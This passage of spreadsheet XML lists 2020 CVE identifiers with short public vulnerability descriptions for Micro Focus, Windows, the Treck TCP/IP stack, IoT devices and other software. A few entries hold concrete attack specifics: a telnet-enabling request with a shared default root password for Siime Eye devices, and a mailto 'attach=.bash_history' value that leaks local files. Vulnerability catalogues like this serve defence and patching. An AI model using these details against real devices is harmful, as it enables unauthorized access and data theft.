    <t>Incorrect Authorization vulnerability in Micro Focus Container Deployment Foundation component affects products: - Hybrid Cloud Management. Versions 2018.05 to 2019.11. - ArcSight Investigate. versions 2.4.0, 3.0.0 and 3.1.0. - ArcSight Transformation Hub. versions 3.0.0, 3.1.0, 3.2.0. - ArcSight Interset. version 6.0.0. - ArcSight ESM (when ArcSight Fusion 1.0 is installed). version 7.2.1. - Service Management Automation (SMA). versions 2018.05 to 2020.02 - Operation Bridge Suite (Containerized). Versions 2018.05 to 2020.02. - Network Operation Management. versions 2017.11 to 2019.11. - Data Center Automation Containerized. versions 2018.05 to 2019.11 - Identity Intelligence. versions 1.1.0 and 1.1.1. The vulnerability could be exploited to provide unauthorized access to the Container Deployment Foundation.</t>
  </si>
  <si>
    <t>CVE-2020-11845</t>
  </si>
  <si>
    <t>Cross Site Scripting vulnerability in Micro Focus Service Manager product. Affecting versions 9.50, 9.51, 9.52, 9.60, 9.61, 9.62, 9.63. The vulnerability could be exploited to allow remote attackers to inject arbitrary web script or HTML.</t>
  </si>
  <si>
    <t>CVE-2020-11848</t>
  </si>
  <si>
    <t>Denial of service vulnerability on Micro Focus ArcSight Management Center. Affecting all versions prior to version 2.9.5. The vulnerability could cause the server to become unavailable, causing a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-11849</t>
  </si>
  <si>
    <t>Elevation of privilege and/or unauthorized access vulnerability in Micro Focus Identity Manager. Affecting versions prior to 4.7.3 and 4.8.1 hot fix 1. The vulnerability could allow information exposure that can result in an elevation of privilege or an unauthorized access.</t>
  </si>
  <si>
    <t>CVE-2020-1185</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1134, CVE-2020-1144, CVE-2020-1184, CVE-2020-1186, CVE-2020-1187, CVE-2020-1188, CVE-2020-1189, CVE-2020-1190, CVE-2020-1191.</t>
  </si>
  <si>
    <t>CVE-2020-11851</t>
  </si>
  <si>
    <t>Arbitrary code execution vulnerability on Micro Focus ArcSight Logger product, affecting all version prior to 7.1.1. The vulnerability could be remotely exploited resulting in the execution of arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-11852</t>
  </si>
  <si>
    <t>DKIM key management page vulnerability on Micro Focus Secure Messaging Gateway (SMG). Affecting all SMG Appliance running releases prior to July 2020. The vulnerability could allow a logged in user with rights to generate DKIM key information to inject system commands into the call to the DKIM system command.</t>
  </si>
  <si>
    <t>CVE-2020-11853</t>
  </si>
  <si>
    <t>Arbitrary code execution vulnerability affecting multiple Micro Focus products. 1.) Operation Bridge Manager affecting version: 2020.05, 2019.11, 2019.05, 2018.11, 2018.05, versions 10.6x and 10.1x and older versions. 2.) Application Performance Management affecting versions : 9.51, 9.50 and 9.40 with uCMDB 10.33 CUP 3 3.) Data Center Automation affected version 2019.11 4.) Operations Bridge (containerized) affecting versions: 2019.11, 2019.08, 2019.05, 2018.11, 2018.08, 2018.05, 2018.02, 2017.11 5.) Universal CMDB affecting version: 2020.05, 2019.11, 2019.05, 2019.02, 2018.11, 2018.08, 2018.05, 11, 10.33, 10.32, 10.31, 10.30 6.) Hybrid Cloud Management affecting version 2020.05 7.) Service Management Automation affecting version 2020.5 and 2020.02. The vulnerability could allow to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-11854</t>
  </si>
  <si>
    <t>Arbitrary code execution vlnerability in Operation bridge Manager, Application Performance Management and Operations Bridge (containerized) vulnerability in Micro Focus products products Operation Bridge Manager, Operation Bridge (containerized) and Application Performance Management. The vulneravility affects: 1.) Operation Bridge Manager versions 2020.05, 2019.11, 2019.05, 2018.11, 2018.05, 10.63,10.62, 10.61, 10.60, 10.12, 10.11, 10.10 and all earlier versions. 2.) Operations Bridge (containerized) 2020.05, 2019.08, 2019.05, 2018.11, 2018.08, 2018.05. 2018.02 and 2017.11. 3.) Application Performance Management versions 9,51, 9.50 and 9.40 with uCMDB 10.33 CUP 3. The vulnerability could allow Arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-11855</t>
  </si>
  <si>
    <t>An Authorization Bypass vulnerability on Micro Focus Operation Bridge Reporter, affecting version 10.40 and earlier. The vulnerability could allow local attackers on the OBR host to execute code with escalated privileges.</t>
  </si>
  <si>
    <t>CVE-2020-11856</t>
  </si>
  <si>
    <t>Arbitrary code execution vulnerability on Micro Focus Operation Bridge Reporter, affecting version 10.40 and earlier. The vulnerability could allow remote attackers to execute arbitrary code on affected installations of OBR.</t>
  </si>
  <si>
    <t>CVE-2020-11857</t>
  </si>
  <si>
    <t>An Authorization Bypass vulnerability on Micro Focus Operation Bridge Reporter, affecting version 10.40 and earlier. The vulnerability could allow remote attackers to access the OBR host as a non-admin user</t>
  </si>
  <si>
    <t>CVE-2020-11858</t>
  </si>
  <si>
    <t>Code execution with escalated privileges vulnerability in Micro Focus products Operation Bridge Manager and Operation Bridge (containerized). The vulneravility affects: 1.) Operation Bridge Manager versions: 2020.05, 2019.11, 2019.05, 2018.11, 2018.05, 10.63,10.62, 10.61, 10.60, 10.12, 10.11, 10.10 and all earlier versions. 2.) Operations Bridge (containerized) versions: 2020.05, 2019.08, 2019.05, 2018.11, 2018.08, 2018.05. 2018.02 and 2017.11. The vulnerability could allow local attackers to execute code with escalated privileges.</t>
  </si>
  <si>
    <t>CVE-2020-1186</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1134, CVE-2020-1144, CVE-2020-1184, CVE-2020-1185, CVE-2020-1187, CVE-2020-1188, CVE-2020-1189, CVE-2020-1190, CVE-2020-1191.</t>
  </si>
  <si>
    <t>CVE-2020-11860</t>
  </si>
  <si>
    <t>Cross-Site Scripting vulnerability on Micro Focus ArcSight Logger product, affecting all version prior to 7.1.1. The vulnerability could be remotely exploited resulting in Cross-Site Scripting (XSS)</t>
  </si>
  <si>
    <t>CVE-2020-11861</t>
  </si>
  <si>
    <t>Unauthorized escalation of local privileges vulnerability on Micro Focus Operation Agent, affecting all versions prior to versions 12.11. The vulnerability could be exploited to escalate the local privileges and gain root access on the system.</t>
  </si>
  <si>
    <t>CVE-2020-11863</t>
  </si>
  <si>
    <t>libEMF (aka ECMA-234 Metafile Library) through 1.0.11 allows denial of service (issue 1 of 2).</t>
  </si>
  <si>
    <t>CVE-2020-11864</t>
  </si>
  <si>
    <t>libEMF (aka ECMA-234 Metafile Library) through 1.0.11 allows denial of service (issue 2 of 2).</t>
  </si>
  <si>
    <t>CVE-2020-11865</t>
  </si>
  <si>
    <t>libEMF (aka ECMA-234 Metafile Library) through 1.0.11 allows out-of-bounds memory access.</t>
  </si>
  <si>
    <t>CVE-2020-11866</t>
  </si>
  <si>
    <t>libEMF (aka ECMA-234 Metafile Library) through 1.0.11 allows a use-after-free.</t>
  </si>
  <si>
    <t>CVE-2020-11867</t>
  </si>
  <si>
    <t>Audacity through 2.3.3 saves temporary files to /var/tmp/audacity-$USER by default. After Audacity creates the temporary directory, it sets its permissions to 755. Any user on the system can read and play the temporary audio .au files located there.</t>
  </si>
  <si>
    <t>CVE-2020-11868</t>
  </si>
  <si>
    <t>ntpd in ntp before 4.2.8p14 and 4.3.x before 4.3.100 allows an off-path attacker to block unauthenticated synchronization via a server mode packet with a spoofed source IP address, because transmissions are rescheduled even when a packet lacks a valid origin timestamp.</t>
  </si>
  <si>
    <t>CVE-2020-11869</t>
  </si>
  <si>
    <t>An integer overflow was found in QEMU 4.0.1 through 4.2.0 in the way it implemented ATI VGA emulation. This flaw occurs in the ati_2d_blt() routine in hw/display/ati-2d.c while handling MMIO write operations through the ati_mm_write() callback. A malicious guest could abuse this flaw to crash the QEMU process, resulting in a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-1187</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1134, CVE-2020-1144, CVE-2020-1184, CVE-2020-1185, CVE-2020-1186, CVE-2020-1188, CVE-2020-1189, CVE-2020-1190, CVE-2020-1191.</t>
  </si>
  <si>
    <t>CVE-2020-11872</t>
  </si>
  <si>
    <t>The Cloud Functions subsystem in OpenTrace 1.0 might allow fabrication attacks by making billions of TempID requests before an AES-256-GCM key rotation occurs.</t>
  </si>
  <si>
    <t>CVE-2020-11873</t>
  </si>
  <si>
    <t>An issue was discovered on LG mobile devices with Android OS 7.2, 8.0, 8.1, 9, and 10 software. A stack-based buffer overflow in the logging tool could allow an attacker to gain privileges. The LG ID is LVE-SMP-200005 (April 2020).</t>
  </si>
  <si>
    <t>CVE-2020-11874</t>
  </si>
  <si>
    <t>An issue was discovered on LG mobile devices with Android OS 8.0, 8.1, 9, and 10 software. Attackers can bypass Factory Reset Protection (FRP). The LG ID is LVE-SMP-200004 (March 2020).</t>
  </si>
  <si>
    <t>CVE-2020-11875</t>
  </si>
  <si>
    <t>An issue was discovered on LG mobile devices with Android OS 8.0, 8.1, 9.0, and 10.0 (MTK chipsets) software. The MTK kernel does not properly implement exception handling, allowing an attacker to gain privileges. The LG ID is LVE-SMP-200001 (February 2020).</t>
  </si>
  <si>
    <t>CVE-2020-11876</t>
  </si>
  <si>
    <t>** DISPUTED ** airhost.exe in Zoom Client for Meetings 4.6.11 uses the SHA-256 hash of 0123425234234fsdfsdr3242 for initialization of an OpenSSL EVP AES-256 CBC context. NOTE: the vendor states that this initialization only occurs within unreachable code.</t>
  </si>
  <si>
    <t>CVE-2020-11877</t>
  </si>
  <si>
    <t>** DISPUTED ** airhost.exe in Zoom Client for Meetings 4.6.11 uses 3423423432325249 as the Initialization Vector (IV) for AES-256 CBC encryption. NOTE: the vendor states that this IV is used only within unreachable code.</t>
  </si>
  <si>
    <t>CVE-2020-11878</t>
  </si>
  <si>
    <t>The Jitsi Meet (aka docker-jitsi-meet) stack on Docker before stable-4384-1 uses default passwords (such as passw0rd) for system accounts.</t>
  </si>
  <si>
    <t>CVE-2020-11879</t>
  </si>
  <si>
    <t>An issue was discovered in GNOME Evolution before 3.35.91. By using the proprietary (non-RFC6068) "mailto?attach=..." parameter, a website (or other source of mailto links) can make Evolution attach local files or directories to a composed email message without showing a warning to the user, as demonstrated by an attach=. value.</t>
  </si>
  <si>
    <t>CVE-2020-1188</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1134, CVE-2020-1144, CVE-2020-1184, CVE-2020-1185, CVE-2020-1186, CVE-2020-1187, CVE-2020-1189, CVE-2020-1190, CVE-2020-1191.</t>
  </si>
  <si>
    <t>CVE-2020-11880</t>
  </si>
  <si>
    <t>An issue was discovered in KDE KMail before 19.12.3. By using the proprietary (non-RFC6068) "mailto?attach=..." parameter, a website (or other source of mailto links) can make KMail attach local files to a composed email message without showing a warning to the user, as demonstrated by an attach=.bash_history value.</t>
  </si>
  <si>
    <t>CVE-2020-11881</t>
  </si>
  <si>
    <t>An array index error in MikroTik RouterOS 6.41.3 through 6.46.5, and 7.x through 7.0 Beta5, allows an unauthenticated remote attacker to crash the SMB server via modified setup-request packets, aka SUP-12964.</t>
  </si>
  <si>
    <t>CVE-2020-11882</t>
  </si>
  <si>
    <t>The O2 Business application 1.2.0 for Android exposes the canvasm.myo2.SplashActivity activity to other applications. The purpose of this activity is to handle deeplinks that can be delivered either via links or by directly calling the activity. However, the deeplink format is not properly validated. This can be abused by an attacker to redirect a user to any page and deliver any content to the user.</t>
  </si>
  <si>
    <t>CVE-2020-11883</t>
  </si>
  <si>
    <t>In Divante vue-storefront-api through 1.11.1 and storefront-api through 1.0-rc.1, as used in VueStorefront PWA, unexpected HTTP requests lead to an exception that discloses the error stack trace, with absolute file paths and Node.js module names.</t>
  </si>
  <si>
    <t>CVE-2020-11884</t>
  </si>
  <si>
    <t>In the Linux kernel 4.19 through 5.6.7 on the s390 platform, code execution may occur because of a race condition, as demonstrated by code in enable_sacf_uaccess in arch/s390/lib/uaccess.c that fails to protect against a concurrent page table upgrade, aka CID-3f777e19d171. A crash could also occur.</t>
  </si>
  <si>
    <t>CVE-2020-11885</t>
  </si>
  <si>
    <t>WSO2 Enterprise Integrator through 6.6.0 has an XXE vulnerability where a user (with admin console access) can use the XML validator to make unintended network invocations such as SSRF via an uploaded file.</t>
  </si>
  <si>
    <t>CVE-2020-11886</t>
  </si>
  <si>
    <t>OpenNMS Horizon and Meridian allows HQL Injection in element/nodeList.htm (aka the NodeListController) via snmpParm or snmpParmValue to addCriteriaForSnmpParm. This affects Horizon before 25.2.1, Meridian 2019 before 2019.1.4, Meridian 2018 before 2018.1.16, and Meridian 2017 before 2017.1.21.</t>
  </si>
  <si>
    <t>CVE-2020-11887</t>
  </si>
  <si>
    <t>svg2png 4.1.1 allows XSS with resultant SSRF via JavaScript inside an SVG document.</t>
  </si>
  <si>
    <t>CVE-2020-11888</t>
  </si>
  <si>
    <t>python-markdown2 through 2.3.8 allows XSS because element names are mishandled unless a \w+ match succeeds. For example, an attack might use elementname@ or elementname- with an onclick attribute.</t>
  </si>
  <si>
    <t>CVE-2020-11889</t>
  </si>
  <si>
    <t>An issue was discovered in Joomla! before 3.9.17. Incorrect ACL checks in the access level section of com_users allow the unauthorized deletion of usergroups.</t>
  </si>
  <si>
    <t>CVE-2020-1189</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1134, CVE-2020-1144, CVE-2020-1184, CVE-2020-1185, CVE-2020-1186, CVE-2020-1187, CVE-2020-1188, CVE-2020-1190, CVE-2020-1191.</t>
  </si>
  <si>
    <t>CVE-2020-11890</t>
  </si>
  <si>
    <t>An issue was discovered in Joomla! before 3.9.17. Improper input validations in the usergroup table class could lead to a broken ACL configuration.</t>
  </si>
  <si>
    <t>CVE-2020-11891</t>
  </si>
  <si>
    <t>An issue was discovered in Joomla! before 3.9.17. Incorrect ACL checks in the access level section of com_users allow the unauthorized editing of usergroups.</t>
  </si>
  <si>
    <t>CVE-2020-11894</t>
  </si>
  <si>
    <t>Ming (aka libming) 0.4.8 has a heap-based buffer over-read (8 bytes) in the function decompileIF() in decompile.c.</t>
  </si>
  <si>
    <t>CVE-2020-11895</t>
  </si>
  <si>
    <t>Ming (aka libming) 0.4.8 has a heap-based buffer over-read (2 bytes) in the function decompileIF() in decompile.c.</t>
  </si>
  <si>
    <t>CVE-2020-11896</t>
  </si>
  <si>
    <t>The Treck TCP/IP stack before 6.0.1.66 allows Remote Code Execution, related to IPv4 tunneling.</t>
  </si>
  <si>
    <t>CVE-2020-11897</t>
  </si>
  <si>
    <t>The Treck TCP/IP stack before 5.0.1.35 has an Out-of-Bounds Write via multiple malformed IPv6 packets.</t>
  </si>
  <si>
    <t>CVE-2020-11898</t>
  </si>
  <si>
    <t>The Treck TCP/IP stack before 6.0.1.66 improperly handles an IPv4/ICMPv4 Length Parameter Inconsistency, which might allow remote attackers to trigger an information leak.</t>
  </si>
  <si>
    <t>CVE-2020-11899</t>
  </si>
  <si>
    <t>The Treck TCP/IP stack before 6.0.1.66 has an IPv6 Out-of-bounds Read.</t>
  </si>
  <si>
    <t>CVE-2020-1190</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1134, CVE-2020-1144, CVE-2020-1184, CVE-2020-1185, CVE-2020-1186, CVE-2020-1187, CVE-2020-1188, CVE-2020-1189, CVE-2020-1191.</t>
  </si>
  <si>
    <t>CVE-2020-11900</t>
  </si>
  <si>
    <t>The Treck TCP/IP stack before 6.0.1.41 has an IPv4 tunneling Double Free.</t>
  </si>
  <si>
    <t>CVE-2020-11901</t>
  </si>
  <si>
    <t>The Treck TCP/IP stack before 6.0.1.66 allows Remote Code execution via a single invalid DNS response.</t>
  </si>
  <si>
    <t>CVE-2020-11902</t>
  </si>
  <si>
    <t>The Treck TCP/IP stack before 6.0.1.66 has an IPv6OverIPv4 tunneling Out-of-bounds Read.</t>
  </si>
  <si>
    <t>CVE-2020-11903</t>
  </si>
  <si>
    <t>The Treck TCP/IP stack before 6.0.1.28 has a DHCP Out-of-bounds Read.</t>
  </si>
  <si>
    <t>CVE-2020-11904</t>
  </si>
  <si>
    <t>The Treck TCP/IP stack before 6.0.1.66 has an Integer Overflow during Memory Allocation that causes an Out-of-Bounds Write.</t>
  </si>
  <si>
    <t>CVE-2020-11905</t>
  </si>
  <si>
    <t>The Treck TCP/IP stack before 6.0.1.66 has a DHCPv6 Out-of-bounds Read.</t>
  </si>
  <si>
    <t>CVE-2020-11906</t>
  </si>
  <si>
    <t>The Treck TCP/IP stack before 6.0.1.66 has an Ethernet Link Layer Integer Underflow.</t>
  </si>
  <si>
    <t>CVE-2020-11907</t>
  </si>
  <si>
    <t>The Treck TCP/IP stack before 6.0.1.66 improperly handles a Length Parameter Inconsistency in TCP.</t>
  </si>
  <si>
    <t>CVE-2020-11908</t>
  </si>
  <si>
    <t>The Treck TCP/IP stack before 4.7.1.27 mishandles '\0' termination in DHCP.</t>
  </si>
  <si>
    <t>CVE-2020-11909</t>
  </si>
  <si>
    <t>The Treck TCP/IP stack before 6.0.1.66 has an IPv4 Integer Underflow.</t>
  </si>
  <si>
    <t>CVE-2020-1191</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1134, CVE-2020-1144, CVE-2020-1184, CVE-2020-1185, CVE-2020-1186, CVE-2020-1187, CVE-2020-1188, CVE-2020-1189, CVE-2020-1190.</t>
  </si>
  <si>
    <t>CVE-2020-11910</t>
  </si>
  <si>
    <t>The Treck TCP/IP stack before 6.0.1.66 has an ICMPv4 Out-of-bounds Read.</t>
  </si>
  <si>
    <t>CVE-2020-11911</t>
  </si>
  <si>
    <t>The Treck TCP/IP stack before 6.0.1.66 has Improper ICMPv4 Access Control.</t>
  </si>
  <si>
    <t>CVE-2020-11912</t>
  </si>
  <si>
    <t>The Treck TCP/IP stack before 6.0.1.66 has a TCP Out-of-bounds Read.</t>
  </si>
  <si>
    <t>CVE-2020-11913</t>
  </si>
  <si>
    <t>CVE-2020-11914</t>
  </si>
  <si>
    <t>The Treck TCP/IP stack before 6.0.1.66 has an ARP Out-of-bounds Read.</t>
  </si>
  <si>
    <t>CVE-2020-11915</t>
  </si>
  <si>
    <t>An issue was discovered in Svakom Siime Eye 14.1.00000001.3.330.0.0.3.14. By sending a set_params.cgi?telnetd=1&amp;save=1&amp;reboot=1 request to the webserver, it is possible to enable the telnet interface on the device. The telnet interface can then be used to obtain access to the device with root privileges via a reecam4debug default password. This default telnet password is the same across all Siime Eye devices. In order for the attack to be exploited, an attacker must be physically close in order to connect to the device's Wi-Fi access point.</t>
  </si>
  <si>
    <t>CVE-2020-1192</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Visual Studio Code when the Python extension loads workspace settings from a notebook file, aka 'Visual Studio Code Python Extension Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1171.</t>
  </si>
  <si>
    <t>CVE-2020-11920</t>
  </si>
  <si>
    <t>An issue was discovered in Svakom Siime Eye 14.1.00000001.3.330.0.0.3.14. A command injection vulnerability resides in the HOST/IP section of the NFS settings menu in the webserver running on the device. By injecting Bash commands via shell metacharacters here, the device executes arbitrary code with root privileges (all of the device's services are running as root).</t>
  </si>
  <si>
    <t>CVE-2020-11922</t>
  </si>
  <si>
    <t>An issue was discovered in WiZ Colors A60 1.14.0. The device sends unnecessary information to the cloud controller server. Although this information is sent encrypted and has low risk in isolation, it decreases the privacy of the end user. The information sent includes the local IP address being used and the SSID of the Wi-Fi network the device is connected to. (Various resources such as wigle.net can be use for mapping of SSIDs to physical locations.)</t>
  </si>
  <si>
    <t>CVE-2020-11923</t>
  </si>
  <si>
    <t>An issue was discovered in WiZ Colors A60 1.14.0. API credentials are locally logged.</t>
  </si>
  <si>
    <t>CVE-2020-11924</t>
  </si>
  <si>
    <t>An issue was discovered in WiZ Colors A60 1.14.0. Wi-Fi credentials are stored in cleartext in flash memory, which presents an information-disclosure risk for a discarded or resold device.</t>
  </si>
  <si>
    <t>CVE-2020-11925</t>
  </si>
  <si>
    <t>An issue was discovered in Luvion Grand Elite 3 Connect through 2020-02-25. Authentication to the device is based on a username and password. The root credentials are the same across all devices of this model.</t>
  </si>
  <si>
    <t>CVE-2020-11928</t>
  </si>
  <si>
    <t>In the media-library-assistant plugin before 2.82 for WordPress, Remote Code Execution can occur via the tax_query, meta_query, or date_query parameter in mla_gallery via an admin.</t>
  </si>
  <si>
    <t>CVE-2020-1193</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka 'Microsoft Excel Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1332, CVE-2020-1335, CVE-2020-1594.</t>
  </si>
  <si>
    <t>CVE-2020-11930</t>
  </si>
  <si>
    <t>The GTranslate plugin before 2.8.52 for WordPress has Reflected XSS via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option.</t>
  </si>
  <si>
    <t>CVE-2020-11931</t>
  </si>
  <si>
    <t>An Ubuntu-specific modification to Pulseaudio to provide security mediation for Snap-packaged applications was found to have a bypass of intended access restriction for snaps which plugs any of pulseaudio, audio-playback or audio-record via unloading the pulseaudio snap policy module. This issue affects: pulseaudio 1:8.0 versions prior to 1:8.0-0ubuntu3.12; 1:11.1 versions prior to 1:11.1-1ubuntu7.7; 1:13.0 versions prior to 1:13.0-1ubuntu1.2; 1:13.99.1 versions prior to 1:13.99.1-1ubuntu3.2;</t>
  </si>
  <si>
    <t>CVE-2020-11932</t>
  </si>
  <si>
    <t>It was discovered that the Subiquity installer for Ubuntu Server logged the LUKS full disk encryption password if one was entered.</t>
  </si>
  <si>
    <t>CVE-2020-11933</t>
  </si>
  <si>
    <t>cloud-init as managed by snapd on Ubuntu Core 16 and Ubuntu Core 18 devices was run without restrictions on every boot, which a physical attacker could exploit by crafting cloud-init user-data/meta-data via external media to perform arbitrary changes on the device to bypass intended security mechanisms such as full disk encryption. This issue did not affect traditional Ubuntu systems. Fixed in snapd version 2.45.2, revision 8539 and core version 2.45.2, revision 9659.</t>
  </si>
  <si>
    <t>CVE-2020-11934</t>
  </si>
  <si>
    <t>It was discovered that snapctl user-open allowed altering the $XDG_DATA_DIRS environment variable when calling the system xdg-open. OpenURL() in usersession/userd/launcher.go would alter $XDG_DATA_DIRS to append a path to a directory controlled by the calling snap. A malicious snap could exploit this to bypass intended access restrictions to control how the host system xdg-open script opens the URL and, for example, execute a script shipped with the snap without confinement. This issue did not affect Ubuntu Core systems. Fixed in snapd versions 2.45.1ubuntu0.2, 2.45.1+18.04.2 and 2.45.1+20.04.2.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N</t>
  </si>
  <si>
    <t>CVE-2020-11937</t>
  </si>
  <si>
    <t>In whoopsie, parse_report() from whoopsie.c allows a local attacker to cause a denial of service via a crafted file. The DoS is caused by resource exhaustion due to a memory leak. Fixed in 0.2.52.5ubuntu0.5, 0.2.62ubuntu0.5 and 0.2.69ubuntu0.1.</t>
  </si>
  <si>
    <t>CVE-2020-11938</t>
  </si>
  <si>
    <t>In JetBrains TeamCity 2018.2 through 2019.2.1, a project administrator was able to see scrambled password parameters used in a project. The issue was resolved in 2019.2.2.</t>
  </si>
  <si>
    <t>CVE-2020-11939</t>
  </si>
  <si>
    <t>In nDPI through 3.2 Stable, the SSH protocol dissector has multiple KEXINIT integer overflows that result in a controlled remote heap overflow in concat_hash_string in ssh.c. Due to the granular nature of the overflow primitive and the ability to control both the contents and layout of the nDPI library's heap memory through remote input, this vulnerability may be abused to achieve full Remote Code Execution against any network inspection stack that is linked against nDPI and uses it to perform network traffic analysis.</t>
  </si>
  <si>
    <t>CVE-2020-1194</t>
  </si>
  <si>
    <t>A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations, aka 'Windows Registry Denial of Service Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-11940</t>
  </si>
  <si>
    <t>In nDPI through 3.2 Stable, an out-of-bounds read in concat_hash_string in ssh.c can be exploited by a network-positioned attacker that can send malformed SSH protocol messages on a network segment monitored by nDPI's library.</t>
  </si>
  <si>
    <t>CVE-2020-11941</t>
  </si>
  <si>
    <t>An issue was discovered in Open-AudIT 3.2.2. There is OS Command injection in Discovery.</t>
  </si>
  <si>
    <t>CVE-2020-11942</t>
  </si>
  <si>
    <t>An issue was discovered in Open-AudIT 3.2.2. There are Multiple SQL Injections.</t>
  </si>
  <si>
    <t>CVE-2020-11943</t>
  </si>
  <si>
    <t>An issue was discovered in Open-AudIT 3.2.2. There is Arbitrary file upload.</t>
  </si>
  <si>
    <t>CVE-2020-11944</t>
  </si>
  <si>
    <t>Abe (aka bitcoin-abe) through 0.7.2, and 0.8pre, allows XSS in __call__ in abe.py because the PATH_INFO environment variable is mishandled during a PageNotFound exception.</t>
  </si>
  <si>
    <t>CVE-2020-11945</t>
  </si>
  <si>
    <t>An issue was discovered in Squid before 5.0.2. A remote attacker can replay a sniffed Digest Authentication nonce to gain access to resources that are otherwise forbidden. This occurs because the attacker can overflow the nonce reference counter (a short integer). Remote code execution may occur if the pooled token credentials are freed (instead of replayed as valid credentials).</t>
  </si>
  <si>
    <t>CVE-2020-11946</t>
  </si>
  <si>
    <t>Zoho ManageEngine OpManager before 125120 allows an unauthenticated user to retrieve an API key via a servlet call.</t>
  </si>
  <si>
    <t>CVE-2020-11947</t>
  </si>
  <si>
    <t>iscsi_aio_ioctl_cb in block/iscsi.c in QEMU 4.1.0 has a heap-based buffer over-read that may disclose unrelated information from process memory to an attacker.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N</t>
  </si>
  <si>
    <t>CVE-2020-11949</t>
  </si>
  <si>
    <t>testserver.cgi of the web service on VIVOTEK Network Cameras before XXXXX-VVTK-2.2002.xx.01x (and before XXXXX-VVTK-0XXXX_Beta2) allows an authenticated user to obtain arbitrary files from a camera's local filesystem. For example, this affects IT9388-HT devices.</t>
  </si>
  <si>
    <t>CVE-2020-1195</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Microsoft Edge (Chromium-based) when the Feedback extension improperly validates input, aka 'Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-11950</t>
  </si>
  <si>
    <t>VIVOTEK Network Cameras before XXXXX-VVTK-2.2002.xx.01x (and before XXXXX-VVTK-0XXXX_Beta2) allows an authenticated user to upload and execute a script (with resultant execution of OS commands). For example, this affects IT9388-HT devices.</t>
  </si>
  <si>
    <t>CVE-2020-11951</t>
  </si>
  <si>
    <t>An issue was discovered on Rittal PDU-3C002DEC through 5.17.10 and CMCIII-PU-9333E0FB through 3.17.10 devices. There is a Backdoor root account.</t>
  </si>
  <si>
    <t>CVE-2020-11952</t>
  </si>
  <si>
    <t>An issue was discovered on Rittal PDU-3C002DEC through 5.17.10 and CMCIII-PU-9333E0FB through 3.17.10 devices. Attackers can bypass the CLI menu.</t>
  </si>
  <si>
    <t>CVE-2020-11953</t>
  </si>
  <si>
    <t>An issue was discovered on Rittal PDU-3C002DEC through 5.15.40 and CMCIII-PU-9333E0FB through 3.15.70_4 devices. Attackers can execute code.</t>
  </si>
  <si>
    <t>CVE-2020-11955</t>
  </si>
  <si>
    <t>An issue was discovered on Rittal PDU-3C002DEC through 5.15.70 and CMCIII-PU-9333E0FB through 3.15.70 devices. There are insecure permissions.</t>
  </si>
  <si>
    <t>CVE-2020-11956</t>
  </si>
  <si>
    <t>An issue was discovered on Rittal PDU-3C002DEC through 5.17.10 and CMCIII-PU-9333E0FB through 3.17.10 devices. There is a least privilege violation.</t>
  </si>
  <si>
    <t>CVE-2020-11957</t>
  </si>
  <si>
    <t>The Bluetooth Low Energy implementation in Cypress PSoC Creator BLE 4.2 component versions before 3.64 generates a random number (Pairing Random) with significantly less entropy than the specified 128 bits during BLE pairing. This is the case for both authenticated and unauthenticated pairing with both LE Secure Connections as well as LE Legacy Pairing. A predictable or brute-forceable random number allows an attacker (in radio range) to perform a MITM attack during BLE pairing.</t>
  </si>
  <si>
    <t>CVE-2020-11958</t>
  </si>
  <si>
    <t>re2c 1.3 has a heap-based buffer overflow in Scanner::fill in parse/scanner.cc via a long lexeme.</t>
  </si>
  <si>
    <t>CVE-2020-11959</t>
  </si>
  <si>
    <t>An unsafe configuration of nginx lead to information leak in Xiaomi router R3600 ROM before 1.0.50.</t>
  </si>
  <si>
    <t>CVE-2020-1196</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory, aka 'Windows Print Configuration Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-11960</t>
  </si>
  <si>
